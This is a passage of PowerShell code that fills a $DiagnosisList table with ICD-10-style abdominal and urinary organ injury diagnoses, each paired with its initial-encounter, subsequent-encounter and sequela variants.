$DiagnosisList.Rows.Add("Other injury of unspecified part of pancreas","Other injury of unspecified part of pancreas, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of pancreas","Other injury of unspecified part of pancreas, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of stomach","Unspecified injury of stomach, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of stomach","Unspecified injury of stomach, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of stomach","Unspecified injury of stomach, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of stomach","Contusion of stomach, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of stomach","Contusion of stomach, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of stomach","Contusion of stomach, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of stomach","Laceration of stomach, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of stomach","Laceration of stomach, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of stomach","Laceration of stomach, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of stomach","Other injury of stomach, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of stomach","Other injury of stomach, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of stomach","Other injury of stomach, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of duodenum","Unspecified injury of duodenum, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of duodenum","Unspecified injury of duodenum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of duodenum","Unspecified injury of duodenum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other part of small intestine","Unspecified injury of other part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other part of small intestine","Unspecified injury of other part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other part of small intestine","Unspecified injury of other part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of small intestine","Unspecified injury of unspecified part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of small intestine","Unspecified injury of unspecified part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of small intestine","Unspecified injury of unspecified part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of duodenum","Primary blast injury of duodenum, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of duodenum","Primary blast injury of duodenum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of duodenum","Primary blast injury of duodenum, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of other part of small intestine","Primary blast injury of other part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of other part of small intestine","Primary blast injury of other part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of other part of small intestine","Primary blast injury of other part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified part of small intestine","Primary blast injury of unspecified part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified part of small intestine","Primary blast injury of unspecified part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified part of small intestine","Primary blast injury of unspecified part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of duodenum","Contusion of duodenum, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of duodenum","Contusion of duodenum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of duodenum","Contusion of duodenum, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of other part of small intestine","Contusion of other part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other part of small intestine","Contusion of other part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other part of small intestine","Contusion of other part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of small intestine","Contusion of unspecified part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of small intestine","Contusion of unspecified part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of small intestine","Contusion of unspecified part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of duodenum","Laceration of duodenum, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of duodenum","Laceration of duodenum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of duodenum","Laceration of duodenum, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other part of small intestine","Laceration of other part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other part of small intestine","Laceration of other part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other part of small intestine","Laceration of other part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of small intestine","Laceration of unspecified part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of small intestine","Laceration of unspecified part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of small intestine","Laceration of unspecified part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of duodenum","Other injury of duodenum, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of duodenum","Other injury of duodenum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of duodenum","Other injury of duodenum, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other part of small intestine","Other injury of other part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other part of small intestine","Other injury of other part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other part of small intestine","Other injury of other part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of small intestine","Other injury of unspecified part of small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of small intestine","Other injury of unspecified part of small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of small intestine","Other injury of unspecified part of small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ascending [right] colon","Unspecified injury of ascending [right] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ascending [right] colon","Unspecified injury of ascending [right] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ascending [right] colon","Unspecified injury of ascending [right] colon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of transverse colon","Unspecified injury of transverse colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of transverse colon","Unspecified injury of transverse colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of transverse colon","Unspecified injury of transverse colon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of descending [left] colon","Unspecified injury of descending [left] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of descending [left] colon","Unspecified injury of descending [left] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of descending [left] colon","Unspecified injury of descending [left] colon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of sigmoid colon","Unspecified injury of sigmoid colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of sigmoid colon","Unspecified injury of sigmoid colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of sigmoid colon","Unspecified injury of sigmoid colon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other part of colon","Unspecified injury of other part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other part of colon","Unspecified injury of other part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other part of colon","Unspecified injury of other part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of colon","Unspecified injury of unspecified part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of colon","Unspecified injury of unspecified part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified part of colon","Unspecified injury of unspecified part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of ascending [right] colon","Primary blast injury of ascending [right] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of ascending [right] colon","Primary blast injury of ascending [right] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of ascending [right] colon","Primary blast injury of ascending [right] colon, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of transverse colon","Primary blast injury of transverse colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of transverse colon","Primary blast injury of transverse colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of transverse colon","Primary blast injury of transverse colon, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of descending [left] colon","Primary blast injury of descending [left] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of descending [left] colon","Primary blast injury of descending [left] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of descending [left] colon","Primary blast injury of descending [left] colon, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of sigmoid colon","Primary blast injury of sigmoid colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of sigmoid colon","Primary blast injury of sigmoid colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of sigmoid colon","Primary blast injury of sigmoid colon, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of other part of colon","Primary blast injury of other part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of other part of colon","Primary blast injury of other part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of other part of colon","Primary blast injury of other part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified part of colon","Primary blast injury of unspecified part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified part of colon","Primary blast injury of unspecified part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified part of colon","Primary blast injury of unspecified part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of ascending [right] colon","Contusion of ascending [right] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ascending [right] colon","Contusion of ascending [right] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ascending [right] colon","Contusion of ascending [right] colon, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of transverse colon","Contusion of transverse colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of transverse colon","Contusion of transverse colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of transverse colon","Contusion of transverse colon, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of descending [left] colon","Contusion of descending [left] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of descending [left] colon","Contusion of descending [left] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of descending [left] colon","Contusion of descending [left] colon, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of sigmoid colon","Contusion of sigmoid colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of sigmoid colon","Contusion of sigmoid colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of sigmoid colon","Contusion of sigmoid colon, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of other part of colon","Contusion of other part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other part of colon","Contusion of other part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other part of colon","Contusion of other part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of colon","Contusion of unspecified part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of colon","Contusion of unspecified part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of colon","Contusion of unspecified part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ascending [right] colon","Laceration of ascending [right] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ascending [right] colon","Laceration of ascending [right] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ascending [right] colon","Laceration of ascending [right] colon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of transverse colon","Laceration of transverse colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of transverse colon","Laceration of transverse colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of transverse colon","Laceration of transverse colon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of descending [left] colon","Laceration of descending [left] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of descending [left] colon","Laceration of descending [left] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of descending [left] colon","Laceration of descending [left] colon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of sigmoid colon","Laceration of sigmoid colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of sigmoid colon","Laceration of sigmoid colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of sigmoid colon","Laceration of sigmoid colon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other part of colon","Laceration of other part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other part of colon","Laceration of other part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other part of colon","Laceration of other part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of colon","Laceration of unspecified part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of colon","Laceration of unspecified part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified part of colon","Laceration of unspecified part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of ascending [right] colon","Other injury of ascending [right] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ascending [right] colon","Other injury of ascending [right] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ascending [right] colon","Other injury of ascending [right] colon, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of transverse colon","Other injury of transverse colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of transverse colon","Other injury of transverse colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of transverse colon","Other injury of transverse colon, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of descending [left] colon","Other injury of descending [left] colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of descending [left] colon","Other injury of descending [left] colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of descending [left] colon","Other injury of descending [left] colon, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of sigmoid colon","Other injury of sigmoid colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of sigmoid colon","Other injury of sigmoid colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of sigmoid colon","Other injury of sigmoid colon, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other part of colon","Other injury of other part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other part of colon","Other injury of other part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other part of colon","Other injury of other part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of colon","Other injury of unspecified part of colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of colon","Other injury of unspecified part of colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified part of colon","Other injury of unspecified part of colon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of rectum","Unspecified injury of rectum, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of rectum","Unspecified injury of rectum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of rectum","Unspecified injury of rectum, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of rectum","Primary blast injury of rectum, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of rectum","Primary blast injury of rectum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of rectum","Primary blast injury of rectum, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of rectum","Contusion of rectum, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of rectum","Contusion of rectum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of rectum","Contusion of rectum, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of rectum","Laceration of rectum, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of rectum","Laceration of rectum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of rectum","Laceration of rectum, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of rectum","Other injury of rectum, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of rectum","Other injury of rectum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of rectum","Other injury of rectum, sequela") + $null = $DiagnosisList.Rows.Add("Injury of peritoneum","Injury of peritoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of peritoneum","Injury of peritoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of peritoneum","Injury of peritoneum, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of other intra-abdominal organs","Contusion of other intra-abdominal organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other intra-abdominal organs","Contusion of other intra-abdominal organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other intra-abdominal organs","Contusion of other intra-abdominal organs, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other intra-abdominal organs","Laceration of other intra-abdominal organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other intra-abdominal organs","Laceration of other intra-abdominal organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other intra-abdominal organs","Laceration of other intra-abdominal organs, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other intra-abdominal organs","Other injury of other intra-abdominal organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other intra-abdominal organs","Other injury of other intra-abdominal organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other intra-abdominal organs","Other injury of other intra-abdominal organs, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other intra-abdominal organs","Unspecified injury of other intra-abdominal organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other intra-abdominal organs","Unspecified injury of other intra-abdominal organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other intra-abdominal organs","Unspecified injury of other intra-abdominal organs, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified intra-abdominal organ","Unspecified injury of unspecified intra-abdominal organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified intra-abdominal organ","Unspecified injury of unspecified intra-abdominal organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified intra-abdominal organ","Unspecified injury of unspecified intra-abdominal organ, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified intra-abdominal organ","Contusion of unspecified intra-abdominal organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified intra-abdominal organ","Contusion of unspecified intra-abdominal organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified intra-abdominal organ","Contusion of unspecified intra-abdominal organ, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified intra-abdominal organ","Laceration of unspecified intra-abdominal organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified intra-abdominal organ","Laceration of unspecified intra-abdominal organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified intra-abdominal organ","Laceration of unspecified intra-abdominal organ, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified intra-abdominal organ","Other injury of unspecified intra-abdominal organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified intra-abdominal organ","Other injury of unspecified intra-abdominal organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified intra-abdominal organ","Other injury of unspecified intra-abdominal organ, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right kidney","Unspecified injury of right kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right kidney","Unspecified injury of right kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right kidney","Unspecified injury of right kidney, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left kidney","Unspecified injury of left kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left kidney","Unspecified injury of left kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left kidney","Unspecified injury of left kidney, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified kidney","Unspecified injury of unspecified kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified kidney","Unspecified injury of unspecified kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified kidney","Unspecified injury of unspecified kidney, sequela") + $null = $DiagnosisList.Rows.Add("Minor contusion of right kidney","Minor contusion of right kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of right kidney","Minor contusion of right kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of right kidney","Minor contusion of right kidney, sequela") + $null = $DiagnosisList.Rows.Add("Minor contusion of left kidney","Minor contusion of left kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of left kidney","Minor contusion of left kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of left kidney","Minor contusion of left kidney, sequela") + $null = $DiagnosisList.Rows.Add("Minor contusion of unspecified kidney","Minor contusion of unspecified kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of unspecified kidney","Minor contusion of unspecified kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor contusion of unspecified kidney","Minor contusion of unspecified kidney, sequela") + $null = $DiagnosisList.Rows.Add("Major contusion of right kidney","Major contusion of right kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of right kidney","Major contusion of right kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of right kidney","Major contusion of right kidney, sequela") + $null = $DiagnosisList.Rows.Add("Major contusion of left kidney","Major contusion of left kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of left kidney","Major contusion of left kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of left kidney","Major contusion of left kidney, sequela") + $null = $DiagnosisList.Rows.Add("Major contusion of unspecified kidney","Major contusion of unspecified kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of unspecified kidney","Major contusion of unspecified kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major contusion of unspecified kidney","Major contusion of unspecified kidney, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of right kidney, unspecified degree","Laceration of right kidney, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right kidney, unspecified degree","Laceration of right kidney, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right kidney, unspecified degree","Laceration of right kidney, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of left kidney, unspecified degree","Laceration of left kidney, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left kidney, unspecified degree","Laceration of left kidney, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left kidney, unspecified degree","Laceration of left kidney, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified kidney, unspecified degree","Laceration of unspecified kidney, unspecified degree, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified kidney, unspecified degree","Laceration of unspecified kidney, unspecified degree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified kidney, unspecified degree","Laceration of unspecified kidney, unspecified degree, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of right kidney","Minor laceration of right kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right kidney","Minor laceration of right kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of right kidney","Minor laceration of right kidney, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of left kidney","Minor laceration of left kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left kidney","Minor laceration of left kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of left kidney","Minor laceration of left kidney, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified kidney","Minor laceration of unspecified kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified kidney","Minor laceration of unspecified kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of unspecified kidney","Minor laceration of unspecified kidney, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of right kidney","Moderate laceration of right kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of right kidney","Moderate laceration of right kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of right kidney","Moderate laceration of right kidney, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of left kidney","Moderate laceration of left kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of left kidney","Moderate laceration of left kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of left kidney","Moderate laceration of left kidney, sequela") + $null = $DiagnosisList.Rows.Add("Moderate laceration of unspecified kidney","Moderate laceration of unspecified kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of unspecified kidney","Moderate laceration of unspecified kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Moderate laceration of unspecified kidney","Moderate laceration of unspecified kidney, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of right kidney","Major laceration of right kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right kidney","Major laceration of right kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of right kidney","Major laceration of right kidney, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of left kidney","Major laceration of left kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left kidney","Major laceration of left kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of left kidney","Major laceration of left kidney, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified kidney","Major laceration of unspecified kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified kidney","Major laceration of unspecified kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of unspecified kidney","Major laceration of unspecified kidney, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of right kidney","Other injury of right kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of right kidney","Other injury of right kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of right kidney","Other injury of right kidney, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of left kidney","Other injury of left kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of left kidney","Other injury of left kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of left kidney","Other injury of left kidney, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified kidney","Other injury of unspecified kidney, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified kidney","Other injury of unspecified kidney, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified kidney","Other injury of unspecified kidney, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ureter","Unspecified injury of ureter, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ureter","Unspecified injury of ureter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ureter","Unspecified injury of ureter, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of ureter","Contusion of ureter, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ureter","Contusion of ureter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ureter","Contusion of ureter, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ureter","Laceration of ureter, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ureter","Laceration of ureter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ureter","Laceration of ureter, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of ureter","Other injury of ureter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ureter","Other injury of ureter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ureter","Other injury of ureter, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bladder","Unspecified injury of bladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bladder","Unspecified injury of bladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of bladder","Unspecified injury of bladder, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of bladder","Contusion of bladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bladder","Contusion of bladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of bladder","Contusion of bladder, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of bladder","Laceration of bladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of bladder","Laceration of bladder, subsequent encounter") + $null = 